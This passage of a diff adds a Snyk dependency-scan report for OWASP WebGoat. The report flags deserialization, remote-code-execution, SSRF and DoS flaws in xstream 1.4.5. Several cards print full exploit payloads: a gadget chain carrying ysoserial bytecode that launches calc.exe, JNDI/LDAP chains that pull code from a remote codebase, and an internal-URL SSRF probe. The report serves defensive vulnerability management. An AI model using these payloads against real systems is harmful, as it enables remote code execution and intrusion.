+              &lt;unserializable-parents/&gt;
+              &lt;hashtable&gt;
+                &lt;default&gt;
+                  &lt;loadFactor&gt;0.75&lt;/loadFactor&gt;
+                  &lt;threshold&gt;525&lt;/threshold&gt;
+                &lt;/default&gt;
+                &lt;int&gt;700&lt;/int&gt;
+                &lt;int&gt;1&lt;/int&gt;
+                &lt;string&gt;ggg&lt;/string&gt;
+                &lt;javax.swing.UIDefaults_-ProxyLazyValue&gt;
+                  &lt;className&gt;javax.naming.InitialContext&lt;/className&gt;
+                  &lt;methodName&gt;doLookup&lt;/methodName&gt;
+                  &lt;args&gt;
+                    &lt;arg&gt;ldap://localhost:1099/CallRemoteMethod&lt;/arg&gt;
+                  &lt;/args&gt;
+                &lt;/javax.swing.UIDefaults_-ProxyLazyValue&gt;
+              &lt;/hashtable&gt;
+              &lt;javax.swing.UIDefaults&gt;
+                &lt;default&gt;
+                  &lt;defaultLocale reference=&#39;../../../../../../../javax.swing.UIDefaults/default/defaultLocale&#39;/&gt;
+                  &lt;resourceCache/&gt;
+                &lt;/default&gt;
+              &lt;/javax.swing.UIDefaults&gt;
+            &lt;/javax.swing.UIDefaults&gt;
+          &lt;/tables&gt;
+        &lt;/default&gt;
+      &lt;/javax.swing.MultiUIDefaults&gt;
+    &lt;/value&gt;
+  &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+  &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;type&gt;ysomap&lt;/type&gt;
+    &lt;value class=&#39;com.sun.org.apache.xpath.internal.objects.XString&#39;&gt;
+      &lt;m__obj class=&#39;string&#39;&gt;test&lt;/m__obj&gt;
+    &lt;/value&gt;
+  &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+&lt;/sorted-set&gt;
+</code></pre><pre><code>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</code></pre><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.18 or higher.</p><h2>References</h2><ul><li><a href="https://x-stream.github.io/CVE-2021-39154.html" target="_blank" rel="noopener noreferrer">XStream Advisory</a></li><li><a href="https://x-stream.github.io/changes.html#1.4.18" target="_blank" rel="noopener noreferrer">XStream Changelog</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569185" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">275</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Arbitrary Code Execution</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569186</li>
+      <li class="card-meta-item">CWE-434</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream&#39;s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</p><h3>PoC</h3><pre><code>&lt;linked-hash-set&gt;
+  &lt;dynamic-proxy&gt;
+    &lt;interface&gt;map&lt;/interface&gt;
+    &lt;handler class=&#39;com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl&#39;&gt;
+	  &lt;classToInvocationHandler class=&#39;linked-hash-map&#39;/&gt;
+      &lt;defaultHandler class=&#39;sun.tracing.NullProvider&#39;&gt;
+        &lt;active&gt;true&lt;/active&gt;
+        &lt;providerType&gt;java.lang.Object&lt;/providerType&gt;
+        &lt;probes&gt;
+          &lt;entry&gt;
+            &lt;method&gt;
+              &lt;class&gt;java.lang.Object&lt;/class&gt;
+              &lt;name&gt;hashCode&lt;/name&gt;
+              &lt;parameter-types/&gt;
+            &lt;/method&gt;
+            &lt;sun.tracing.dtrace.DTraceProbe&gt;
+              &lt;proxy class=&#39;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&#39; serialization=&#39;custom&#39;/&gt;
+                &lt;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&gt;
+                  &lt;default&gt;
+                    &lt;__name&gt;Pwnr&lt;/__name&gt;
+                    &lt;__bytecodes&gt;
+                      &lt;byte-array&gt;yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAbeXNvc2VyaWFsL1B3bmVyNjMzNTA1NjA2NTkzAQAdTHlzb3NlcmlhbC9Qd25lcjYzMzUwNTYwNjU5MzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=&lt;/byte-array&gt;
+                      &lt;byte-array&gt;yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ&lt;/byte-array&gt;
+                    &lt;/__bytecodes&gt;
+                    &lt;__transletIndex&gt;-1&lt;/__transletIndex&gt;
+                    &lt;__indentNumber&gt;0&lt;/__indentNumber&gt;
+                  &lt;/default&gt;
+                &lt;/com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&gt;
+              &lt;/proxy&gt;
+              &lt;implementing__method&gt;
+                &lt;class&gt;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&lt;/class&gt;
+                &lt;name&gt;getOutputProperties&lt;/name&gt;
+                &lt;parameter-types/&gt;
+              &lt;/implementing__method&gt;
+            &lt;/sun.tracing.dtrace.DTraceProbe&gt;
+          &lt;/entry&gt;
+</code></pre></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569186" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">274</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Arbitrary Code Execution</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569187</li>
+      <li class="card-meta-item">CWE-434</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream&#39;s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</p><h3>PoC</h3><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+      &lt;type&gt;12345&lt;/type&gt;
+      &lt;value class=&#39;com.sun.org.apache.xpath.internal.objects.XString&#39;&gt;
+        &lt;m__obj class=&#39;string&#39;&gt;com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: &amp;#x3C;none&amp;#x3E;&lt;/m__obj&gt;
+      &lt;/value&gt;
+    &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+      &lt;type&gt;12345&lt;/type&gt;
+      &lt;value class=&#39;com.sun.xml.internal.ws.api.message.Packet&#39; serialization=&#39;custom&#39;&gt;
+        &lt;message class=&#39;com.sun.xml.internal.ws.message.saaj.SAAJMessage&#39;&gt;
+          &lt;parsedMessage&gt;true&lt;/parsedMessage&gt;
+          &lt;soapVersion&gt;SOAP_11&lt;/soapVersion&gt;
+          &lt;bodyParts/&gt;
+          &lt;sm class=&#39;com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl&#39;&gt;
+            &lt;attachmentsInitialized&gt;false&lt;/attachmentsInitialized&gt;
+            &lt;multiPart class=&#39;com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart&#39;&gt;
+              &lt;soapPart/&gt;
+              &lt;mm&gt;
+                &lt;it class=&#39;com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator&#39;&gt;
+                  &lt;aliases class=&#39;com.sun.jndi.ldap.LdapBindingEnumeration&#39;&gt;
+                    &lt;homeCtx&gt;
+                      &lt;hostname&gt;233.233.233.233&lt;/hostname&gt;
+                      &lt;port__number&gt;2333&lt;/port__number&gt;
+                      &lt;clnt class=&#39;com.sun.jndi.ldap.LdapClient&#39;/&gt;
+                    &lt;/homeCtx&gt;
+                    &lt;hasMoreCalled&gt;true&lt;/hasMoreCalled&gt;
+                    &lt;more&gt;true&lt;/more&gt;
+                    &lt;posn&gt;0&lt;/posn&gt;
+                    &lt;limit&gt;1&lt;/limit&gt;
+                    &lt;entries&gt;
+                      &lt;com.sun.jndi.ldap.LdapEntry&gt;
+                        &lt;DN&gt;uid=songtao.xu,ou=oa,dc=example,dc=com&lt;/DN&gt;
+                        &lt;attributes class=&#39;javax.naming.directory.BasicAttributes&#39; serialization=&#39;custom&#39;&gt;
+                          &lt;javax.naming.directory.BasicAttribute&gt;
+                            &lt;default&gt;
+                              &lt;ignoreCase&gt;false&lt;/ignoreCase&gt;
+                            &lt;/default&gt;
+                            &lt;int&gt;4&lt;/int&gt;
+                            &lt;javax.naming.directory.BasicAttribute serialization=&#39;custom&#39;&gt;
+                              &lt;javax.naming.directory.BasicAttribute&gt;
+                                &lt;default&gt;
+                                  &lt;ordered&gt;false&lt;/ordered&gt;
+                                  &lt;attrID&gt;objectClass&lt;/attrID&gt;
+                                &lt;/default&gt;
+                                &lt;int&gt;1&lt;/int&gt;
+                                &lt;string&gt;javanamingreference&lt;/string&gt;
+                              &lt;/javax.naming.directory.BasicAttribute&gt;
+                            &lt;/javax.naming.directory.BasicAttribute&gt;
+                            &lt;javax.naming.directory.BasicAttribute serialization=&#39;custom&#39;&gt;
+                              &lt;javax.naming.directory.BasicAttribute&gt;
+                                &lt;default&gt;
+                                  &lt;ordered&gt;false&lt;/ordered&gt;
+                                  &lt;attrID&gt;javaCodeBase&lt;/attrID&gt;
+                                &lt;/default&gt;
+                                &lt;int&gt;1&lt;/int&gt;
+                                &lt;string&gt;http://127.0.0.1:2333/&lt;/string&gt;
+                              &lt;/javax.naming.directory.BasicAttribute&gt;
+                            &lt;/javax.naming.directory.BasicAttribute&gt;
+                            &lt;javax.naming.directory.BasicAttribute serialization=&#39;custom&#39;&gt;
+                              &lt;javax.naming.directory.BasicAttribute&gt;
+                                &lt;default&gt;
+                                  &lt;ordered&gt;false&lt;/ordered&gt;
+                                  &lt;attrID&gt;javaClassName&lt;/attrID&gt;
+                                &lt;/default&gt;
+                                &lt;int&gt;1&lt;/int&gt;
+                                &lt;string&gt;refClassName&lt;/string&gt;
+                              &lt;/javax.naming.directory.BasicAttribute&gt;
+                            &lt;/javax.naming.directory.BasicAttribute&gt;
+                            &lt;javax.naming.directory.BasicAttribute serialization=&#39;custom&#39;&gt;
+                              &lt;javax.naming.directory.BasicAttribute&gt;
+                                &lt;default&gt;
+                                  &lt;ordered&gt;false&lt;/ordered&gt;
+                       
+</code></pre></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569187" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">501</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569190</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream&#39;s security framework with a whitelist limited to the minimal required types.</p><h3>PoC</h3><pre><code>&lt;map&gt;
+  &lt;entry&gt;
+    &lt;jdk.nashorn.internal.runtime.Source_-URLData&gt;
+      &lt;url&gt;http://localhost:8080/internal/&lt;/url&gt;
+      &lt;cs&gt;GBK&lt;/cs&gt;
+      &lt;hash&gt;1111&lt;/hash&gt;
+      &lt;array&gt;b&lt;/array&gt;
+      &lt;length&gt;0&lt;/length&gt;
+      &lt;lastModified&gt;0&lt;/lastModified&gt;
+    &lt;/jdk.nashorn.internal.runtime.Source_-URLData&gt;
+    &lt;jdk.nashorn.internal.runtime.Source_-URLData reference=&#39;../jdk.nashorn.internal.runtime.Source_-URLData&#39;/&gt;
+  &lt;/entry&gt;
+  &lt;entry&gt;
+    &lt;jdk.nashorn.internal.runtime.Source_-URLData&gt;
+      &lt;url&gt;http://localhost:8080/internal/&lt;/url&gt;
+      &lt;cs reference=&#39;../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs&#39;/&gt;
+      &lt;hash&gt;1111&lt;/hash&gt;
+      &lt;array&gt;b&lt;/array&gt;
+      &lt;length&gt;0&lt;/length&gt;
+      &lt;lastModified&gt;0&lt;/lastModified&gt;
+    &lt;/jdk.nashorn.internal.runtime.Source_-URLData&gt;
+    &lt;jdk.nashorn.internal.runtime.Source_-URLData reference=&#39;../jdk.nashorn.internal.runtime.Source_-URLData&#39;/&gt;
+  &lt;/entry&gt;
+&lt;/map&gt;
+</code></pre><pre><code>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</code></pre><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.18 or higher.</p><h2>References</h2><ul><li><a href="https://x-stream.github.io/CVE-2021-39152.html" target="_blank" rel="noopener noreferrer">XStream Advisory</a></li><li><a href="https://x-stream.github.io/changes.html#1.4.18" target="_blank" rel="noopener noreferrer">XStream Changelog</a></li><li><a href="https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39152.yaml" target="_blank" rel="noopener noreferrer">Nuclei Templates</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569190" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">279</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Server-Side Request Forgery (SSRF)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569191</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream&#39;s security framework with a whitelist limited to the minimal required types.</p><h3>PoC</h3><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;dynamic-proxy&gt;
+      &lt;interface&gt;java.lang.Comparable&lt;/interface&gt;
+      &lt;handler class=&#39;com.sun.xml.internal.ws.client.sei.SEIStub&#39;&gt;
+        &lt;owner/&gt;
+        &lt;managedObjectManagerClosed&gt;false&lt;/managedObjectManagerClosed&gt;
+        &lt;databinding class=&#39;com.sun.xml.internal.ws.db.DatabindingImpl&#39;&gt;
+          &lt;stubHandlers&gt;
+            &lt;entry&gt;
+              &lt;method&gt;
+                &lt;class&gt;java.lang.Comparable&lt;/class&gt;
+                &lt;name&gt;compareTo&lt;/name&gt;
+                &lt;parameter-types&gt;
+                  &lt;class&gt;java.lang.Object&lt;/class&gt;
+                &lt;/parameter-types&gt;
+              &lt;/method&gt;
+              &lt;com.sun.xml.internal.ws.client.sei.StubHandler&gt;
+                &lt;bodyBuilder class=&#39;com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit&#39;&gt;
+                  &lt;indices&gt;
+                    &lt;int&gt;0&lt;/int&gt;
+                  &lt;/indices&gt;
+                  &lt;getters&gt;
+                    &lt;com.sun.xml.internal.ws.client.sei.ValueGetter&gt;PLAIN&lt;/com.sun.xml.internal.ws.client.sei.ValueGetter&gt;
+                  &lt;/getters&gt;
+                  &lt;accessors&gt;
+                    &lt;com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2&gt;
+                      &lt;val_-isJAXBElement&gt;false&lt;/val_-isJAXBElement&gt;
+                      &lt;val_-getter class=&#39;com.sun.xml.internal.ws.spi.db.FieldGetter&#39;&gt;
+                        &lt;type&gt;int&lt;/type&gt;
+                        &lt;field&gt;
+                          &lt;name&gt;hash&lt;/name&gt;
+                          &lt;clazz&gt;java.lang.String&lt;/clazz&gt;
+                        &lt;/field&gt;
+                      &lt;/val_-getter&gt;
+                      &lt;val_-isListType&gt;false&lt;/val_-isListType&gt;
+                      &lt;val_-n&gt;
+                        &lt;namespaceURI/&gt;
+                        &lt;localPart&gt;hash&lt;/localPart&gt;
+                        &lt;prefix/&gt;
+                      &lt;/val_-n&gt;
+                      &lt;val_-setter class=&#39;com.sun.xml.internal.ws.spi.db.MethodSetter&#39;&gt;
+                        &lt;type&gt;java.lang.String&lt;/type&gt;
+                        &lt;method&gt;
+                          &lt;class&gt;jdk.nashorn.internal.runtime.Source&lt;/class&gt;
+                          &lt;name&gt;readFully&lt;/name&gt;
+                          &lt;parameter-types&gt;
+                            &lt;class&gt;java.net.URL&lt;/class&gt;
+                          &lt;/parameter-types&gt;
+                        &lt;/method&gt;
+                      &lt;/val_-setter&gt;
+                      &lt;outer-class&gt;
+                        &lt;propertySetters&gt;
+                          &lt;entry&gt;
+                            &lt;string&gt;serialPersistentFields&lt;/string&gt;
+                            &lt;com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                              &lt;type&gt;[Ljava.io.ObjectStreamField;&lt;/type&gt;
+                              &lt;field&gt;
+                                &lt;name&gt;serialPersistentFields&lt;/name&gt;
+                                &lt;clazz&gt;java.lang.String&lt;/clazz&gt;
+                              &lt;/field&gt;
+                            &lt;/com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                          &lt;/entry&gt;
+                          &lt;entry&gt;
+                            &lt;string&gt;CASE_INSENSITIVE_ORDER&lt;/string&gt;
+                            &lt;com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                              &lt;type&gt;java.util.Comparator&lt;/type&gt;
+                              &lt;field&gt;
+                                &lt;name&gt;CASE_INSENSITIVE_ORDER&lt;/name&gt;
+                                &lt;clazz&gt;java.lang.String&lt;/clazz&gt;
+                              &lt;/field&gt;
+                            &lt;/com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                          &lt;/entry&gt;
+                          &lt;entry&gt;
+                            &lt;string&gt;serialVersionUID&lt;/string&gt;
+                            &lt;com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                              &lt;type&gt;long&lt;/type&gt;
+                              &lt;field&gt;
+                                &lt;name&gt;serialVersionUID&lt;/name&gt;
+                                &lt;clazz&gt;java.lang.String&lt;/clazz&gt;
+                              &lt;/field&gt;
+                            &lt;/com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                          &lt;/entry&gt;
+                          &lt;entry&gt;
+                            &lt;string&gt;value&lt;/string&gt;
+                            &lt;com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                              &lt;type&gt;[C&lt;/type&gt;
+                       
+</code></pre></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569191" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">172</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Denial of Service (DoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-2388977</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item" style="color:#AB1A1A;font-weight:600">Reachable</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream and replace or inject objects, that result in exponential recursively hashcode calculation,</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p><p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p><p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p><p>When it 